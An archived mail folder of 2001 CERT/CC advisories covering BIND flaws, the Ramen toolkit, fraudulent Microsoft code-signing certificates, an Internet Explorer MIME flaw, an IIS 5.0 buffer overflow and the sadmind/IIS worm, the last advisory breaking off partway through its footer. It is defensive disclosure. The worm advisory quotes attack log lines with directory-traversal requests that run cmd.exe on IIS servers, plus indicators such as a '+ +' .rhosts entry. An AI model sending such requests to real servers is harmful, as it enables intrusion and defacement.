From MAILER-DAEMON Wed Jun 10 15:24:35 2009 Date: 10 Jun 2009 15:24:35 -0700 From: Mail System Internal Data Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA Message-ID: <1244672675@chandra> X-IMAP: 1236375416 0000000630 Junk NonJunk Status: RO This text is part of the internal format of your mail folder, and is not a real message. It is created automatically by the mail system software. If deleted, important folder data will be lost, and it will be re-created with the data reset to initial values. From - Wed Feb 28 14:42:37 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f1SMfUe07435; Wed, 28 Feb 2001 14:41:30 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.10) with SMTP id PAA22774; Wed, 28 Feb 2001 15:21:15 -0500 (EST) Date: Wed, 28 Feb 2001 15:21:15 -0500 (EST) Received: by canaveral.red.cert.org; Wed, 28 Feb 2001 15:16:20 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 Subject: CERT Summary CS-2001-01 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: b7929d44472f16e4257c9dd4688b9c53 Status: RO X-Status: X-Keywords: X-UID: 4 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2001-01 February 28, 2001 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in November 2000 (CS-2000-04), we have seen continued compromises via well-known vulnerabilities in rpc.statd and FTPD, as well as exploitations of recently discovered vulnerabilities in BIND and LPRng. Notable virus activity includes W32/Hybris and VBS/OnTheFly (Anna Kournakova). For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. Multiple Vulnerabilities in BIND The CERT/CC has learned of four vulnerabilities spanning multiple versions of the Internet Software Consortium's (ISC) Berkeley Internet Name Domain (BIND) server. BIND is an implementation of the Domain Name System (DNS) that is maintained by the ISC. Because the majority of name servers in operation today run BIND, these vulnerabilities present a serious threat to the Internet infrastructure. The CERT/CC has begun receiving reports of these vulnerabilities being successfully exploited. Sites are encouraged to follow the advice in CA-2001-02 to protect systems. CERT Advisory CA-2001-01 Multiple Vulnerabilities in BIND http://www.cert.org/advisories/CA-2001-02.html 2. Compromises Via Ramen Toolkit The CERT/CC has received reports from sites that have recovered an intruder toolkit called 'ramen' from compromised hosts. Ramen has been discussed in several public forums and the toolkit is publicly available. Ramen exploits known vulnerabilities in FTPD, rpc.statd, and LPRng; and it contains a mechanism to self-propagate. Over the past several months we have received multiple daily reports of sites being root compromised by the Ramen toolkit. Sites, especially those running Linux, are encouraged to review the following document: CERT Incident Note IN-2001-01, Widespread Compromises via "ramen" Toolkit http://www.cert.org/incident_notes/IN-2001-01.html 3. Input Validation Problems in LPRng A popular replacement software package to the BSD lpd printing service called LPRng contains at least one software defect, known as a "format string vulnerability," which may allow remote users to execute arbitrary code on vulnerable systems. Sites are encouraged to follow the advice in CA-2000-22 to protect systems. CERT Advisory CA-2000-22 Input Validation Problems in LPRng http://www.cert.org/advisories/CA-2000-22.html 4. VBS/OnTheFly (Anna Kournikova) Malicious Code The "VBS/OnTheFly" malicious code is a VBScript program that, when executed, sends a copy of itself as an email file attachment. On February 12, the CERT Coordination Center received a large number of reports from sites infected with VBS/OnTheFly. Several of the sites reported suffering network degradation as a result of mail traffic generated by VBS/OnTheFly. The CERT/CC has received few reports since the initial outbreak. For information on how to prevent or recover from a VBS/OnTheFly infection, please see: CERT Advisory CA-2001-03 VBS/OnTheFly (Anna Kournikova) Malicious Code http://www.cert.org/advisories/CA-2001-03.html ______________________________________________________________________ New Vulnerability Notes Database On December 15, 2000, the CERT/CC began publishing vulnerability notes in a new format, and at a new location. Vulnerability notes are very similar to advisories, but they may have less complete information and solutions may not be available for all the vulnerabilities described in vulnerability notes. There are currently more than 70 vulnerability notes available in the database. We will continue publishing vulnerability notes in accordance with our vulnerability disclosure policy. Vulnerability notes can be found at: The CERT Coordination Center Vulnerability Notes Database http://www.kb.cert.org/vuls/ ______________________________________________________________________ What's New and Updated Since the last CERT summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Incident notes http://www.cert.org/incident_notes/ * CERT/CC statistics http://www.cert.org/stats/cert_stats.html * Security improvement modules http://www.cert.org/security-improvement/ Descriptions of these documents and links to them can be found on our "What's New" page: What's New http://www.cert.org/nav/whatsnew.html ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2001-01.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright (C) 2001 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBOp1bcQYcfu8gsZJZAQFIMQP9G2X9YFe3JOfExLMiu4sRGjCIlLwqhlnq DdIXAAkAoaEZ9aVn6xKlSWLezmxlf8vftx+m+6kNRmHUf26VIKfARBUYXIG2bIjP EkydQwuteDHX4ZmDLZZbm8Yg1beCSBkFrVcrn9PAOMSFn1Qs5YqESDYaBDxEGQo6 5EJRBR1nEIw= =r/mx -----END PGP SIGNATURE----- From - Thu Mar 22 16:06:00 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f2MNvIo06099; Thu, 22 Mar 2001 15:57:18 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.10) with SMTP id SAA27468; Thu, 22 Mar 2001 18:26:04 -0500 (EST) Date: Thu, 22 Mar 2001 18:26:04 -0500 (EST) Received: by canaveral.red.cert.org; Thu, 22 Mar 2001 18:21:09 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 Subject: CERT Advisory CA-2001-04 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 4bceb49c96cb416035666817e782f94f Status: RO X-Status: X-Keywords: X-UID: 5 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-04 Unauthentic "Microsoft Corporation" Certificates Original release date: March 22, 2001 Last revised: March 22, 2001 Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Systems whose users run code signed by Microsoft Corporation. Overview On January 29 and 30, 2001, VeriSign, Inc. issued two certificates to an individual fraudulently claiming to be an employee of Microsoft Corporation. Any code signed by these certificates will appear to be legitimately signed by Microsoft when, in fact, it is not. Although users who try to run code signed with these certificates will generally be presented with a warning dialog, there will not be any obvious reason to believe that the certificate is not authentic. I. Description Microsoft released a security bulletin on March 22, 2001, describing two certificates issued by VeriSign to an individual fraudulently claiming to be an employee of Microsoft. The full text of Microsoft's security bulletin is available from their web site at http://www.microsoft.com/technet/security/bulletin/MS01-017.asp Additional information about this issue is also available from VeriSign's web site: http://www.verisign.com/developer/notice/authenticode/index.html This issue presents a security risk because even a reasonably cautious user could be deceived into trusting the bogus certificates, since they appear to be from Microsoft. Once accepted, these certificates may allow an attacker to execute malicious code on the user's system. This problem is the result of a failure by the certificate authority to correctly authenticate the recipient of a certificate. Verisign has taken the appropriate action by revoking the certificates in question. However, this in itself is insufficient to prevent the malicious use of these certificates until a patch has been installed, because Internet Explorer does not check for such revocations automatically. II. Impact Anyone with the private portions of the certificates can sign code such that it appears to have originated from Microsoft Corporation. If the user approves the execution of code signed by one of the bogus certificates, it can take any action on the system with the privileges of the user who approved the execution. The fake certificates can only be used for Authenticode signing. III. Solution Check "Microsoft Corporation" Certificates You can identify the fake certificates by checking the validity dates and serial numbers of the certificates. When prompted to authorize the execution of code signed by "Microsoft Corporation", press the "More Info" button to obtain additional information about the certificate used to sign the code. The fake certificates have the following description: Issued to: Microsoft Corporation Issued by: VeriSign Commercial Software Publishers CA Valid from 1/29/2001 to 1/30/2002 Serial number is 1B51 90F7 3724 399C 9254 CD42 4637 996A Issued to: Microsoft Corporation Issued by: VeriSign Commercial Software Publishers CA Valid from 1/30/2001 to 1/31/2002 Serial number is 750E 40FF 97F0 47ED F556 C708 4EB1 ABFD No legitimate certificates were issued to Microsoft between January 29 and 30, 2001. Certificates with these initial validity dates or serial numbers should not be authorized to execute code. The certificate revocation list for the fake certificates can be found at http://crl.verisign.com/Class3SoftwarePublishers.crl Apply a Patch from Your Vendor While there do not appear to be any patches available at this time that directly address this issue, Microsoft is working on producing patches that will ensure the invalid certificates are not used. Appendix A. - Vendor Information Microsoft Corporation Microsoft has published a security bulletin describing this issue at http://www.microsoft.com/technet/security/bulletin/MS01-017.asp Netscape Netscape takes all security and privacy issues very seriously. The Netscape browser does not allow the execution of ActiveX controls, signed or unsigned, and therefore Netscape users are not vulnerable to exploits which rely on signed ActiveX. In the unlikely event that Netscape users are presented with signed content from Microsoft requesting enhanced privileges, Netscape users can protect themselves by denying permission to any such request. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-04.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History March 22, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBOrqFRQYcfu8gsZJZAQHmXwQAnv3ZVVEmHT2FtU65E9cqo9YIhqGmJoGw cEGD3p8I/gF4hYRWXu0TQiohj/tG3/E1ensFcO9fGOREESNbkNErMIpp5c3d0e8Y ruYPTwD8H+ZcBwgg1MiBzeQG9CgJI8Br/eil3xjKEu+f62I9A3Gn4kast/TitTXV 2adcgOHQ/5g= =Kr9o -----END PGP SIGNATURE----- From - Tue Apr 3 11:35:43 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f33IW9f12116; Tue, 3 Apr 2001 11:32:09 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA19015; Tue, 3 Apr 2001 14:03:32 -0400 (EDT) Date: Tue, 3 Apr 2001 14:03:32 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 3 Apr 2001 13:58:13 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 Subject: CERT Advisory CA-2001-06 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 190da9d936be780e253c9f75f28a9988 Status: RO X-Status: X-Keywords: X-UID: 6 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-06 Automatic Execution of Embedded MIME Types Original release date: April 03, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * All versions of Microsoft Internet Explorer 5.5 SP1 or earlier, except IE 5.01 SP2 * Any software which utilizes vulnerable versions of Internet Explorer to render HTML Overview Microsoft Internet Explorer has a vulnerability triggered when parsing MIME parts in a document that allows a malicious agent to execute arbitrary code. Any user or program that uses vulnerable versions of Internet Explorer to render HTML in a document (for example, when browsing a filesystem, reading email or news messages, or visiting a web page), should immediately upgrade to a non-vulnerable version of Internet Explorer. I. Description There exists in Internet Explorer a table which is used to determine how IE handles MIME types when it encounters MIME parts in any type of HTML document, be it email message, newsgroup posting, web page, or local file. This table contains a set of entries that cause Internet Explorer to open the MIME part without giving the end user the opportunity to decide if the MIME part should be opened. This vulnerability allows an intruder to construct malicious content that, when viewed in Internet Explorer (or any program that uses the IE HTML rendering engine), can execute arbitrary code. It is not necessary to run an attachment; simply viewing the document in a vulnerable program is sufficient to execute arbitrary code. For more details, see Microsoft Security Bulletin MS01-020 on this topic at: http://www.microsoft.com/technet/security/bulletin/MS01-020.asp There have been reports that simply previewing HTML content (as in a mail client or filesystem browser) is sufficient to trigger the vulnerability. The impact of viewing malicious code in this manner is being evaluated. The CERT/CC is currently unaware of any reports of this vulnerability being used to successfully attack a system. Demonstration code exploiting this vulnerability has been published in several public forums. This vulnerability is being referenced in CVE as CAN-2001-0154 and by the CERT/CC as VU#980499. II. Impact Attackers can cause arbitrary code to be executed on a victim's system by embedding the code in a malicious email, or news message, or web page. III. Solution Apply the patch from Microsoft Apply the patch from Microsoft, available at: http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp As noted in the 'Caveats' section of the Microsoft advisory, end users must apply this patch to supported versions of Microsoft's browser. This means IE must be upgraded to IE 5.01 Service Pack 1 or IE 5.5 Service Pack 1 before users can apply this patch. Users who have not previously upgraded will incorrectly receive a message stating that they do not need to apply this patch, even though they are vulnerable. Users are advised to upgrade to IE 5.5 SP1, IE 5.01 SP1 or SP2 (which has this patch incorporated in it) and apply the appropriate patch. An excerpt from MS01-020: Caveats: If the patch is installed on a system running a version of IE other than the one it is designed for, an error message will be displayed saying that the patch is not needed. This message is incorrect, and customers who see this message should upgrade to a supported version of IE and re-install the patches. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Cyrusoft International, Inc. Mulberry does not use Internet Explorer to render HTML within Mulberry itself and is not vulnerable to these kinds of problems. Users can save HTML attachments to disk and then view those in browsers susceptible to this problem, but this requires the direct intervention of the user to explicitly save to disk - simply viewing HTML in Mulberry does not expose users to these kinds of problems. Our HTML rendering is a basic styled-text only renderer that does not execute any form of scripts. This is true on all the platforms we support: Win32, Mac OS (Classic & X), Solaris, linux. An official statement about this is available on our website at: http://www.cyrusoft.com/mulberry/htmlsecurity.html Lotus Development Corporation Notes does not use IE to render HTML-formatted mail messages. Microsoft Corporation Please see the advisory (MS01-020, "Incorrect MIME Header Can Cause IE to Execute E-mail Attachment") related to this issue at: http://www.microsoft.com/technet/security/bulletin/MS01-020.asp A patch is available for this issue at: http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp Netscape Communications Corporation Netscape is currently investigating the impact this vulnerability, if any, has on users of the Netscape browser. Opera Software Opera does not use Internet Explorer or any other external software to render HTML. QUALCOMM Incorporated It is unclear at this time what impact, if any, this vulnerability has on Eudora clients. Appendix B. - References 1. Havrilla, J., and Hernan, S., "CERT Vulnerability Note VU#980499: Certain MIME types can cause Internet Explorer to execute arbitrary code when rendering HTML", March 2001. https://www.kb.cert.org/vuls/id/980499 _________________________________________________________________ Microsoft has acknowledged Juan Carlos Cuartango for bringing this issue to their attention. This document was written by Jeffrey S. Havrilla and Shawn V. Hernan. If you have feedback, comments, or additional information about this issue, please send us email. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-06.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History April 03, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBOsoNNQYcfu8gsZJZAQFd3gQAkCKdIcdKJ/gaii0odrJdM/jlZUv7MYYf R8LUHkV1dUTxEI/SRrKtAoEsf/UVVgZI4PGBB/pyptkmSv2axMWf4AD1Ubful712 ojVaHG7hJuV5RNiw2yE/R4AoWZ5GbdaQByYWpCB+OfwNzsz/7MYibjI6xUtvqRvV JxYMB6q5TqM= =B0Bv -----END PGP SIGNATURE----- From - Wed May 2 17:18:54 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f430GhJ09565; Wed, 2 May 2001 17:16:43 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id SAA24071; Wed, 2 May 2001 18:24:16 -0400 (EDT) Date: Wed, 2 May 2001 18:24:16 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 2 May 2001 18:19:10 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 Subject: CERT Advisory CA-2001-10 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 1e3747e02162ae011224161f8e92ad60 Status: RO X-Status: X-Keywords: X-UID: 7 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-10 Buffer Overflow Vulnerability in Microsoft IIS 5.0 Original release date: May 02, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running Microsoft Windows 2000 with IIS 5.0 enabled Overview A vulnerability exists in Microsoft IIS 5.0 running on Windows 2000 that allows a remote intruder to run arbitrary code on the victim machine, allowing them to gain complete administrative control of the machine. A proof-of-concept exploit is publicly available for this vulnerability, which increases the urgency that system administrators apply the patch. I. Description Windows 2000 includes support for the Internet Printing Protocol (IPP) via an ISAPI extension. According to Microsoft, this extension is installed by default on all Windows 2000 systems, but it is only accesible through IIS 5.0. The IPP extension contains a buffer overflow that could be used by an attacker to execute arbitrary code in the Local System security context, essentially giving the attacker compete control of the system. This vulnerability was discovered by eEye Digital Security. Microsoft has issued the following bulletin regarding this vulnerability: http://www.microsoft.com/technet/security/bulletin/MS01-023.asp This vulnerability has been assigned the identifier CAN-2001-0241 by the Common Vulnerabilities and Exposures (CVE) group: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0241 II. Impact Anyone who can reach a vulnerable web server can execute arbitrary code in the Local System security context, resulting in the intruder gaining complete control of the system. Note that this may be significantly more serious than a simple "web defacement." III. Solution Apply a patch from your vendor A patch is available from Microsoft at http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321 Additional advice on securing IIS web servers is available from http://www.microsoft.com/technet/security/iis5chk.asp http://www.microsoft.com/technet/security/tools.asp Appendix A. Vendor Information Microsoft Corporation The following documents regarding this vulnerability are available from Microsoft: http://www.microsoft.com/technet/security/bulletin/MS01-023.asp References 1. VU#516648: Microsoft Windows 2000/Internet Information Server (IIS) 5.0 Internet Printing Protocol (IPP) ISAPI contains buffer overflow, CERT/CC, 05/02/2001, http://www.kb.cert.org/vuls/id/516648 Authors: Chad Dougherty, Shawn Hernan. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-10.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History May 02, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOvCEtQYcfu8gsZJZAQG11QP+Ipbm1xOc1d0fiY6KbQefsvBVbUDKdwFk jN2mBm9BM28lniyxvP2Jhbw5vt/6vxFlYKnXF7jQvuw5VpHSPkOs+zuQamt15a0u 3rd4l2nWgRFo10vaykFPYLYjjpfW0BOz5ULkkgKwjbswDQfQQ00o9EurXDXOt276 9pPCMThcy4Q= =eVKj -----END PGP SIGNATURE----- From - Tue May 8 01:07:43 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f487vIN16824; Tue, 8 May 2001 00:57:18 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id BAA18554; Tue, 8 May 2001 01:06:48 -0400 (EDT) Date: Tue, 8 May 2001 01:06:48 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 8 May 2001 01:01:58 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 Subject: CERT Advisory CA-2001-11 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: b9739b3409b7ae56683bd60b0716fbb2 Status: RO X-Status: X-Keywords: X-UID: 8 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-11 sadmind/IIS Worm Original release date: May 08, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running unpatched versions of Microsoft IIS * Systems running unpatched versions of Solaris up to, and including, Solaris 7 Overview The CERT/CC has received reports of a new piece of self-propagating malicious code (referred to here as the sadmind/IIS worm). The worm uses two well-known vulnerabilities to compromise systems and deface web pages. I. Description Based on preliminary analysis, the sadmind/IIS worm exploits a vulnerability in Solaris systems and subsequently installs software to attack Microsoft IIS web servers. In addition, it includes a component to propagate itself automatically to other vulnerable Solaris systems. It will add "+ +" to the .rhosts file in the root user's home directory. Finally, it will modify the index.html on the host Solaris system after compromising 2,000 IIS systems. To compromise the Solaris systems, the worm takes advantage of a two-year-old buffer overflow vulnerability in the Solstice sadmind program. For more information on this vulnerability, see http://www.kb.cert.org/vuls/id/28934 http://www.cert.org/advisories/CA-1999-16.html After successfully compromising the Solaris systems, it uses a seven-month-old vulnerability to compromise the IIS systems. For additional information about this vulnerability, see http://www.kb.cert.org/vuls/id/111677 Solaris systems that are successfully compromised via the worm exhibit the following characteristics: * Sample syslog entry from compromised Solaris system May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - c ore dumped May 7 02:40:01 carrier.domain.com last message repeated 1 time May 7 02:40:03 carrier.domain.com last message repeated 1 time May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped May 7 02:40:03 carrier.domain.com last message repeated 1 time May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup May 7 02:40:08 carrier.domain.com last message repeated 1 time May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed * A rootshell listening on TCP port 600 * Existence of the directories * /dev/cub contains logs of compromised machines * /dev/cuc contains tools that the worm uses to operate and propagate Running processes of the scripts associated with the worm, such as the following: * /bin/sh /dev/cuc/sadmin.sh * /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111 * /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80 * /bin/sh /dev/cuc/uniattack.sh * /bin/sh /dev/cuc/time.sh * /usr/sbin/inetd -s /tmp/.f * /bin/sleep 300 Microsoft IIS servers that are successfully compromised exhibit the following characteristics: * Modified web pages that read as follows: fuck USA Government fuck PoizonBOx contact:sysadmcn@yahoo.com.cn * Sample Log from Attacked IIS Server 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/../../winnt/system32/cmd.exe \ /c+copy+\winnt\system32\cmd.exe+root.exe 502 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/root.exe /c+echo+\ <HTML code inserted here>.././index.asp 502 - II. Impact Solaris systems compromised by this worm are being used to scan and compromise other Solaris and IIS systems. IIS systems compromised by this worm can suffer modified web content. Intruders can use the vulnerabilities exploited by this worm to execute arbitrary code with root privileges on vulnerable Solaris systems, and arbitrary commands with the privileges of the IUSR_machinename account on vulnerable Windows systems. We are receiving reports of other activity, including one report of files being destroyed on the compromised Windows machine, rendering them unbootable. It is unclear at this time if this activity is directly related to this worm. III. Solutions Apply a patch from your vendor A patch is available from Microsoft at http://www.microsoft.com/technet/security/bulletin/MS00-078.asp For IIS Version 4: http://www.microsoft.com/ntserver/nts/downloads/critical/q26986 2/default.asp For IIS Version 5: http://www.microsoft.com/windows2000/downloads/critical/q269862 /default.asp Additional advice on securing IIS web servers is available from http://www.microsoft.com/technet/security/iis5chk.asp http://www.microsoft.com/technet/security/tools.asp Apply a patch from Sun Microsystems as described in Sun Security Bulletin #00191: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=se cbull/191&type=0&nav=sec.sba Appendix A. Vendor Information Microsoft Corporation The following documents regarding this vulnerability are available from Microsoft: http://www.microsoft.com/technet/security/bulletin/MS01-023.asp Sun Microsystems Sun has issued the following bulletin for this vulnerability: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=se cbull/191&type=0&nav=sec.sba References 1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 vulnerable to directory traversal via extended unicode in url (MS00-078) http://www.kb.cert.org/vuls/id/111677 2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite Daemon sadmind http://www.cert.org/advisories/CA-1999-16.html Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter, Art Manion, Ian Finlay, John Shaffer ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-11.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: 